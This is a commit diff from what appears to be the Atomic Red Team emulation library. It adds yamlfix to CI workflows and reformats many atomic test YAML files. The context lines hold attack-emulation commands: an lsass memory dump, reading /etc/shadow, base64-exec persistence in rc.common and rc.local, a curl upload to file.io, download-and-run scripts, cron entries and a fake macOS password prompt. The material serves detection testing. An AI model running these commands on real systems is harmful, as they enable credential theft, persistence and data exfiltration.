yamlfix added

2023-11-25 05:18:35 +00:00
133 changed files with 1329 additions and 1188 deletions
@@ -5,7 +5,7 @@

 version: 2
 updates:
-  - package-ecosystem: "pip" # See documentation for possible values
-    directory: "/" # Location of package manifests
-    schedule:
-      interval: "weekly"
+- package-ecosystem: "pip"   # See documentation for possible values
+  directory: "/"   # Location of package manifests
+  schedule:
+    interval: "weekly"
@@ -2,58 +2,59 @@ name: assign-labels

 on:
  workflow_run:
-    workflows: ["validate-atomics"]
+    workflows:
+    - "validate-atomics"
    types:
-      - completed
+    - completed

 jobs:
  assign-labels:
    runs-on: ubuntu-latest
    steps:
-      - name: download-artifact
-        uses: actions/github-script@v6
-        with:
-          script: |
-            let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
-               owner: context.repo.owner,
-               repo: context.repo.repo,
-               run_id: context.payload.workflow_run.id,
-            });
-            let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
-              return artifact.name == "labels.json"
-            })[0];
-            let download = await github.rest.actions.downloadArtifact({
-               owner: context.repo.owner,
-               repo: context.repo.repo,
-               artifact_id: matchArtifact.id,
-               archive_format: 'zip',
-            });
-            let fs = require('fs');
-            fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/labels.zip`, Buffer.from(download.data));
+    - name: download-artifact
+      uses: actions/github-script@v6
+      with:
+        script: |
+          let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+             owner: context.repo.owner,
+             repo: context.repo.repo,
+             run_id: context.payload.workflow_run.id,
+          });
+          let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+            return artifact.name == "labels.json"
+          })[0];
+          let download = await github.rest.actions.downloadArtifact({
+             owner: context.repo.owner,
+             repo: context.repo.repo,
+             artifact_id: matchArtifact.id,
+             archive_format: 'zip',
+          });
+          let fs = require('fs');
+          fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/labels.zip`, Buffer.from(download.data));

-      - name: unzip-artifact
-        run: unzip labels.zip
+    - name: unzip-artifact
+      run: unzip labels.zip

-      - name: assign-labels-and-reviewers
-        uses: actions/github-script@v6
-        with:
-          script: |
-            let fs = require('fs');
-            const obj = JSON.parse(fs.readFileSync('./labels.json'));
-            console.log(obj)
-            if(obj.labels.length > 0){
-              await github.rest.issues.addLabels({
-                issue_number: obj.pr,
-                owner: context.repo.owner,
-                repo: context.repo.repo,
-                labels: obj.labels
-               })
-            }
-            if(obj.maintainers.length > 0){
-              await github.rest.issues.addAssignees({
-                issue_number: obj.pr,
-                owner: context.repo.owner,
-                repo: context.repo.repo,
-                assignees: obj.maintainers
-              });
-            }
+    - name: assign-labels-and-reviewers
+      uses: actions/github-script@v6
+      with:
+        script: |-
+          let fs = require('fs');
+          const obj = JSON.parse(fs.readFileSync('./labels.json'));
+          console.log(obj)
+          if(obj.labels.length > 0){
+            await github.rest.issues.addLabels({
+              issue_number: obj.pr,
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              labels: obj.labels
+             })
+          }
+          if(obj.maintainers.length > 0){
+            await github.rest.issues.addAssignees({
+              issue_number: obj.pr,
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              assignees: obj.maintainers
+            });
+          }
@@ -2,39 +2,42 @@ name: generate-svg-counter

 on:
  push:
-    branches: ["master"]
+    branches:
+    - "master"

 jobs:
  generate-counter:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v3
-        with:
-          token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
-      - name: Install poetry
-        run: pipx install poetry
-      - uses: actions/setup-python@v4
-        with:
-          python-version: '3.11.2' 
-          cache: 'poetry'
-      - name: Install dependencies
-        run: poetry install --no-interaction --no-root
-      - name: Generate shields.io URL
-        run: poetry run python bin/generate_counter.py -f atomics/
-        id: counter
-      - name: Update README
-        run: |
-          echo ${{ steps.counter.outputs.result }}
-          sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
-        shell: bash
-      - name: update github with new site
-        run: |
-          # configure git to prep for commit
-          git config user.email "opensource@redcanary.com"
-          git config user.name "publish bot"
-          git config --global push.default simple
-          git add README.md
-          git commit --allow-empty -m "updating atomics count in README.md [ci skip]"
-          # push quietly to prevent showing the token in log
-          # no need to provide any credentials
-          git push --force
+    - uses: actions/checkout@v3
+      with:
+        token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
+    - name: Install poetry
+      run: pipx install poetry
+    - uses: actions/setup-python@v4
+      with:
+        python-version: '3.11.2'
+        cache: 'poetry'
+    - name: Install dependencies
+      run: poetry install --no-interaction --no-root
+    - name: Fix YAML files
+      run: poetry run yamlfix atomics/T* .github/
+    - name: Generate shields.io URL
+      run: poetry run python bin/generate_counter.py -f atomics/
+      id: counter
+    - name: Update README
+      run: |
+        echo ${{ steps.counter.outputs.result }}
+        sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
+      shell: bash
+    - name: update github with new site
+      run: |-
+        # configure git to prep for commit
+        git config user.email "opensource@redcanary.com"
+        git config user.name "publish bot"
+        git config --global push.default simple
+        git add README.md
+        git commit --allow-empty -m "updating atomics count in README.md [ci skip]"
+        # push quietly to prevent showing the token in log
+        # no need to provide any credentials
+        git push --force
@@ -1,61 +1,62 @@
 name: generate-docs
 on:
  push:
-    branches: ["master"]
+    branches:
+    - "master"

 jobs:
  generate-docs:
    runs-on: ubuntu-latest
    steps:
-      - name: checkout repo
-        uses: actions/checkout@v3
-        with:
-          token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
-      - name: setup ruby
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: 2.7
-          bundler-cache: true 
+    - name: checkout repo
+      uses: actions/checkout@v3
+      with:
+        token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
+    - name: setup ruby
+      uses: ruby/setup-ruby@v1
+      with:
+        ruby-version: 2.7
+        bundler-cache: true

-      - name: Generate and commit unique GUIDs for each atomic test
-        run: |
-            bin/generate-guids.rb
+    - name: Generate and commit unique GUIDs for each atomic test
+      run: |
+        bin/generate-guids.rb

-            echo ""
-            echo ""
-            git status
-            echo ""
-            echo ""
-            git diff-index HEAD --
+        echo ""
+        echo ""
+        git status
+        echo ""
+        echo ""
+        git diff-index HEAD --

-            if git diff-index --quiet HEAD -- ; then
-              echo "Not committing GUID changes because there are no changes"
-            else
-              git config credential.helper 'cache --timeout=120'
-              git config user.email "opensource@redcanary.com"
-              git config user.name "Atomic Red Team GUID generator"
-              git add atomics
-              git commit -am "Generate GUIDs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [skip ci]"
-              git push origin $GITHUB_REF_NAME -f 
-            fi
+        if git diff-index --quiet HEAD -- ; then
+          echo "Not committing GUID changes because there are no changes"
+        else
+          git config credential.helper 'cache --timeout=120'
+          git config user.email "opensource@redcanary.com"
+          git config user.name "Atomic Red Team GUID generator"
+          git add atomics
+          git commit -am "Generate GUIDs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [skip ci]"
+          git push origin $GITHUB_REF_NAME -f 
+        fi

-      - name: generate markdown docs for atomics
-        run: |
-          bin/generate-atomic-docs.rb
-          echo ""
-          echo ""
-          git status
-          echo ""
-          echo ""
-          git diff-index HEAD --
+    - name: generate markdown docs for atomics
+      run: |-
+        bin/generate-atomic-docs.rb
+        echo ""
+        echo ""
+        git status
+        echo ""
+        echo ""
+        git diff-index HEAD --

-          if git diff-index --quiet HEAD -- ; then
-            echo "Not committing documentation because there are no changes"
-          else
-            git config credential.helper 'cache --timeout=120'
-            git config user.email "opensource@redcanary.com"
-            git config user.name "Atomic Red Team doc generator"
-            git add atomics
-            git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
-            git push origin $GITHUB_REF_NAME -f
-          fi
+        if git diff-index --quiet HEAD -- ; then
+          echo "Not committing documentation because there are no changes"
+        else
+          git config credential.helper 'cache --timeout=120'
+          git config user.email "opensource@redcanary.com"
+          git config user.name "Atomic Red Team doc generator"
+          git add atomics
+          git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
+          git push origin $GITHUB_REF_NAME -f
+        fi
@@ -1,19 +1,19 @@
 name: 'Close stale issues and PRs'
 on:
  schedule:
-    - cron: '30 1 * * *'
+  - cron: '30 1 * * *'

 jobs:
  stale:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/stale@v7
-        with:
-          stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
-          stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
-          close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
-          close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
-          days-before-issue-stale: 30
-          days-before-pr-stale: 45
-          days-before-issue-close: 10
-          days-before-pr-close: 10
+    - uses: actions/stale@v7
+      with:
+        stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
+        stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
+        close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
+        close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
+        days-before-issue-stale: 30
+        days-before-pr-stale: 45
+        days-before-issue-close: 10
+        days-before-pr-close: 10
@@ -3,78 +3,82 @@ name: validate-atomics
 on:
  pull_request:
    branches:
-      - master
+    - master

 jobs:
  validate-atomics:
    runs-on: ubuntu-latest
    steps:
-      - name: checkout repo
-        uses: actions/checkout@v3
-      - name: Install poetry
-        run: pipx install poetry
-      - name: setup python3.11
-        uses: actions/setup-python@v4
-        id: setup-python
-        with:
-          python-version: "3.11.2"
-          cache: "poetry"
+    - name: checkout repo
+      uses: actions/checkout@v3
+    - name: Install poetry
+      run: pipx install poetry
+    - name: setup python3.11
+      uses: actions/setup-python@v4
+      id: setup-python
+      with:
+        python-version: "3.11.2"
+        cache: "poetry"

-      - name: Install dependencies
-        run: poetry install --no-interaction --no-root
+    - name: Install dependencies
+      run: poetry install --no-interaction --no-root

-      - name: validate the format of atomics tests against the spec
-        run: |
-          poetry run python bin/validate/validate.py
+    - name: validate yaml
+      run: |
+        poetry run yamlfix atomics/T*
+
+    - name: validate the format of atomics tests against the spec
+      run: |
+        poetry run python bin/validate/validate.py

  validate-terraform:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v3
-      - uses: hashicorp/setup-terraform@v2
+    - uses: actions/checkout@v3
+    - uses: hashicorp/setup-terraform@v2

-      - name: Terraform fmt
-        id: fmt
-        run: terraform fmt -recursive -check
-        continue-on-error: false
+    - name: Terraform fmt
+      id: fmt
+      run: terraform fmt -recursive -check
+      continue-on-error: false

  upload:
    runs-on: ubuntu-latest
    steps:
-      - name: checkout repo
-        uses: actions/checkout@v3
-      - name: Install poetry
-        run: pipx install poetry
-      - name: setup python3.11
-        uses: actions/setup-python@v4
-        id: setup-python
-        with:
-          python-version: "3.11.2"
-          cache: "poetry"
-      - uses: actions/github-script@v6
-        id: get_pr_number
-        with:
-          script: |
-            if (context.issue.number) {
-              // Return issue number if present
-              return context.issue.number;
-            } else {
-              // Otherwise return issue number from commit
-              return (
-                await github.rest.repos.listPullRequestsAssociatedWithCommit({
-                  commit_sha: context.sha,
-                  owner: context.repo.owner,
-                  repo: context.repo.repo,
-                })
-              ).data[0].number;
-            }
-          result-encoding: string
-      - name: Install dependencies
-        run: poetry install --no-interaction --no-root
-      - name: save labels and reviewers into a file.
-        run: |
-          poetry run python bin/generate_labels.py  -t  ${{ secrets.GITHUB_TOKEN }} -pr '${{steps.get_pr_number.outputs.result}}'
-      - uses: actions/upload-artifact@v3
-        with:
-          name: labels.json
-          path: pr/
+    - name: checkout repo
+      uses: actions/checkout@v3
+    - name: Install poetry
+      run: pipx install poetry
+    - name: setup python3.11
+      uses: actions/setup-python@v4
+      id: setup-python
+      with:
+        python-version: "3.11.2"
+        cache: "poetry"
+    - uses: actions/github-script@v6
+      id: get_pr_number
+      with:
+        script: |
+          if (context.issue.number) {
+            // Return issue number if present
+            return context.issue.number;
+          } else {
+            // Otherwise return issue number from commit
+            return (
+              await github.rest.repos.listPullRequestsAssociatedWithCommit({
+                commit_sha: context.sha,
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+              })
+            ).data[0].number;
+          }
+        result-encoding: string
+    - name: Install dependencies
+      run: poetry install --no-interaction --no-root
+    - name: save labels and reviewers into a file.
+      run: |
+        poetry run python bin/generate_labels.py  -t  ${{ secrets.GITHUB_TOKEN }} -pr '${{steps.get_pr_number.outputs.result}}'
+    - uses: actions/upload-artifact@v3
+      with:
+        name: labels.json
+        path: pr/
@@ -222,7 +222,7 @@ atomic_tests:
    The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
    powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
    Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
-    
+
    Author of Out-Minidump: Matthew Graeber (@mattifestation)
  supported_platforms:
  - windows
@@ -10,9 +10,9 @@ atomic_tests:
    https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
    https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
  supported_platforms:
-    - windows
+  - windows
  executor:
    name: command_prompt
    elevation_required: false
-    command: |
+    command: |-
      cmdkey /list
@@ -47,7 +47,6 @@ atomic_tests:
      grep -i "PASS" "#{output_file}"
    cleanup_command: |
      rm -f "#{output_file}"
-
 - name: Dump individual process memory with sh on FreeBSD (Local)
  auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423
  description: |
@@ -94,7 +93,6 @@ atomic_tests:
      strings "#{output_file}" | grep -i PASS
    cleanup_command: |
      rm -f "#{output_file}"
-
 - name: Dump individual process memory with Python (Local)
  auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
  description: |
@@ -69,7 +69,7 @@ atomic_tests:
      type: path
      default: /tmp/T1003.008.txt
  executor:
-    command: | 
+    command: |
      unamestr=$(uname)
      if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > ${output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > ${output_file}; fi
    cleanup_command: |
@@ -1,7 +1,6 @@
 attack_technique: T1003
 display_name: OS Credential Dumping
 atomic_tests:
-
 - name: Gsecdump
  auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
  description: |
@@ -1,7 +1,7 @@
 attack_technique: T1005
 display_name: Data from Local System
 atomic_tests:
- name: Search files of interest and save them to a single zip file (Windows)                                  
+- name: Search files of interest and save them to a single zip file (Windows)
  auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
  description: |
    This test searches for files of certain extensions and saves them to a single zip file prior to extraction.                              
@@ -78,13 +78,13 @@ atomic_tests:
    name: bash
    elevation_required: false
    command: |
-        cd $HOME
-        curl -O #{remote_url}/art
-        curl -O #{remote_url}/gta.db
-        curl -O #{remote_url}/sqlite_dump.sh
-        chmod +x sqlite_dump.sh
-        find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
-    cleanup_command: |
-        rm -f $HOME/.art
-        rm -f $HOME/gta.db
-        rm -f $HOME/sqlite_dump.sh 
+      cd $HOME
+      curl -O #{remote_url}/art
+      curl -O #{remote_url}/gta.db
+      curl -O #{remote_url}/sqlite_dump.sh
+      chmod +x sqlite_dump.sh
+      find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
+    cleanup_command: |-
+      rm -f $HOME/.art
+      rm -f $HOME/gta.db
+      rm -f $HOME/sqlite_dump.sh
@@ -44,4 +44,4 @@ atomic_tests:
  executor:
    command: |
      if [ "$(uname)" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;
-    name: bash
+    name: bash
@@ -31,7 +31,7 @@ atomic_tests:
    cleanup_command: |
      rm #{file_to_pad}
    name: sh
-    
+
 - name: Pad Binary to Change Hash using truncate command - Linux/macOS
  auto_generated_guid: e22a9e89-69c7-410f-a473-e6c212cd2292
  description: |
@@ -1,7 +1,6 @@
 attack_technique: T1027.006
 display_name: HTML Smuggling
 atomic_tests:
-
 - name: HTML Smuggling Remote Payload
  auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
  description: |
@@ -20,8 +19,8 @@ atomic_tests:
  executor:
    command: |
      & "PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html"
-    cleanup_command:
+    cleanup_command: |
      $user = [System.Environment]::UserName;
      Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso -ErrorAction Ignore
    name: powershell
-    elevation_required: false
+    elevation_required: false
@@ -197,10 +197,8 @@ atomic_tests:
    steps: |
      1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.

-
        certutil —ૹu૰rlࢰca࣢c෯he  –‮spli؅t‮‭ −"൏ᶠ൸" #{remote_file} #{local_path}

-
      2. Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command.

    name: manual
@@ -101,7 +101,7 @@ atomic_tests:
      $file = "rad" + $rad + ".tmp"

      whoami.exe /all >> #{output_path}\$file
-    
+
    cleanup_command: |
      Remove-Item -Path #{output_path}\rad*.tmp -Force
    name: powershell
@@ -53,5 +53,5 @@ atomic_tests:
      TMP=`ps | grep totally_legit`
      if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && exit 1; fi
      exit 0
-    cleanup_command: |
+    cleanup_command: |-
      rm -f #{exe_path}
@@ -31,5 +31,4 @@ atomic_tests:
      [ "$(uname)" = 'FreeBSD' ] && /bin/echo "#\!/bin/sh" > "testdirwithspaceend /init " && echo 'echo "print(\"running T1035.006 with space after filename to masquerade init\")" | python3.9' >> "testdirwithspaceend /init " && echo "exit" >> "testdirwithspaceend /init " || /usr/bin/echo -e "%d\na\n#!/usr/bin/perl\nprint \"running T1035.006 with space after filename to masquerade init\\n\";\nqx/cp \/usr\/bin\/perl 'init  '/;\nqx/'.\/init  ' -e 'sleep 5'/;\n.\nwq\n" | ed 'testdirwithspaceend /init ' >/dev/null
      chmod +x 'testdirwithspaceend /init '
      './testdirwithspaceend /init '
-    cleanup_command:
-      rm -rf /tmp/atomic-test-T1036.006
+    cleanup_command: rm -rf /tmp/atomic-test-T1036.006
@@ -24,4 +24,4 @@ atomic_tests:
      4. Populate the plist with the location of your shell script

      	  defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
-    name: manual
+    name: manual
@@ -15,41 +15,39 @@ atomic_tests:
    elevation_required: true
    name: bash

-
 - name: rc.common
  auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
  description: |
    Modify rc.common

  supported_platforms:
-    - linux
+  - linux
  executor:
    name: bash
-    elevation_required: true 
-    command: | 
+    elevation_required: true
+    command: |
      filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
      printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
      printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
      sudo chmod +x /etc/rc.common
-    cleanup_command: | 
+    cleanup_command: |
      origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
-
 - name: rc.local
  auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
  description: |
    Modify rc.local

  supported_platforms:
-    - linux
+  - linux
  executor:
    name: sh
-    elevation_required: true 
-    command: | 
+    elevation_required: true
+    command: |
      filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
      [ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local
      echo "\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
      printf 'exit 0' | sudo tee -a /etc/rc.local
      sudo chmod +x /etc/rc.local
-    cleanup_command: | 
+    cleanup_command: |-
      origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
@@ -16,4 +16,3 @@ atomic_tests:
      sudo rm /Library/StartupItems/EvilStartup.plist
    name: sh
    elevation_required: true
-
@@ -101,7 +101,7 @@ atomic_tests:
      type: url
      default: https://1.eu.dl.wireshark.org/win64/Wireshark-win64-latest.exe
    tshark_path:
-      description: path to tshark.exe 
+      description: path to tshark.exe
      type: path
      default: c:\program files\wireshark\tshark.exe
    npcap_url:
@@ -54,5 +54,5 @@ atomic_tests:
  executor:
    name: bash
    elevation_required: false
-    command: |
+    command: |-
      curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
@@ -214,6 +214,6 @@ atomic_tests:
  executor:
    name: sh
    elevation_required: false
-    command: |
+    command: |-
      [ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9
      if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
@@ -84,7 +84,7 @@ atomic_tests:
  executor:
    name: powershell
    elevation_required: true
-    command: |
+    command: |-
      $syntaxList = #{syntax}
      foreach ($syntax in $syntaxList) {
      #{SharpView} $syntax -}
@@ -95,5 +95,5 @@ atomic_tests:
    name: bash
    command: |
      echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
-    cleanup_command: |
+    cleanup_command: |-
      rm /var/spool/cron/crontabs/#{cron_script_name}
@@ -279,6 +279,6 @@ atomic_tests:
    command: |
      "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
      "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
-    cleanup_command: |
+    cleanup_command: |-
      "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
-      "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
+      "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
@@ -16,4 +16,4 @@ spec:
            - /bin/sh
            - -c
            - date; echo Hello from Atomic Red Team
-          restartPolicy: OnFailure
+          restartPolicy: OnFailure
@@ -27,4 +27,4 @@ atomic_tests:
      Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
    cleanup_command: 'Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force'
    name: powershell
-    elevation_required: true
+    elevation_required: true
@@ -1,38 +1,38 @@
 attack_technique: T1055.011
 display_name: "Process Injection: Extra Window Memory Injection"
 atomic_tests:
-  - name: Process Injection via Extra Window Memory (EWM) x64 executable
-    auto_generated_guid: 93ca40d2-336c-446d-bcef-87f14d438018
-    description: Hooks functions of main process to inject a payload via Extra Window Memory (EWM) injection technique
-    supported_platforms:
-      - windows
-    input_arguments:
-      arch:
-        description: Architecture of payload
-        type: string
-        default: x64
-        choices:
-          - x64
-          - x86
-      exe_binary:
-        description: PE binary for EWM injection
-        type: path
-        default: PathToAtomicsFolder\T1055.011\bin\T1055.011_#{arch}.exe
-      payload_file:
-        description: raw payload to inject
-        type: path
-        default: PathToAtomicsFolder\T1055.011\bin\payload.exe_#{arch}.bin
-    dependency_executor_name: powershell
-    dependencies:
-      - description: "T1055.011x64.exe and payload must exist on disk at specified location (#{exe_binary} and #{payload_file})"
-        prereq_command: "if (Test-Path #{exe_binary}) {exit 0} else {exit 1}"
-        get_prereq_command: |-
-          New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/T1055.011_#{arch}.exe" -OutFile "#{exe_binary}" -UseBasicParsing
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/payload.exe_#{arch}.bin" -OutFile "#{payload_file}" -UseBasicParsing
-    executor:
-      command: |-
-        #{exe_binary}
-      cleanup_command: 'Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force'
-      name: powershell
-      elevation_required: false
+- name: Process Injection via Extra Window Memory (EWM) x64 executable
+  auto_generated_guid: 93ca40d2-336c-446d-bcef-87f14d438018
+  description: Hooks functions of main process to inject a payload via Extra Window Memory (EWM) injection technique
+  supported_platforms:
+  - windows
+  input_arguments:
+    arch:
+      description: Architecture of payload
+      type: string
+      default: x64
+      choices:
+      - x64
+      - x86
+    exe_binary:
+      description: PE binary for EWM injection
+      type: path
+      default: PathToAtomicsFolder\T1055.011\bin\T1055.011_#{arch}.exe
+    payload_file:
+      description: raw payload to inject
+      type: path
+      default: PathToAtomicsFolder\T1055.011\bin\payload.exe_#{arch}.bin
+  dependency_executor_name: powershell
+  dependencies:
+  - description: "T1055.011x64.exe and payload must exist on disk at specified location (#{exe_binary} and #{payload_file})"
+    prereq_command: "if (Test-Path #{exe_binary}) {exit 0} else {exit 1}"
+    get_prereq_command: |-
+      New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/T1055.011_#{arch}.exe" -OutFile "#{exe_binary}" -UseBasicParsing
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/payload.exe_#{arch}.bin" -OutFile "#{payload_file}" -UseBasicParsing
+  executor:
+    command: |-
+      #{exe_binary}
+    cleanup_command: 'Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force'
+    name: powershell
+    elevation_required: false
@@ -143,7 +143,7 @@ atomic_tests:
  - windows
  input_arguments:
    vuln_dll:
-      description: vulnerable DLL 
+      description: vulnerable DLL
      type: path
      default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll
  dependency_executor_name: powershell
@@ -38,4 +38,4 @@ atomic_tests:
    command: |
      PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
      echo $PWD_SPOOF
-    name: bash
+    name: bash
@@ -258,7 +258,6 @@ atomic_tests:
      Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
      Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
      Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
-
 - name: ATHPowerShellCommandLineParameter -Command parameter variations
  auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7
  description: Executes powershell.exe with variations of the -Command parameter
@@ -421,7 +420,6 @@ atomic_tests:
      Invoke-AllChecks
    name: powershell

-
 - name: Abuse Nslookup with DNS Records
  auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
  description: |
@@ -14,4 +14,3 @@ atomic_tests:
    command: |
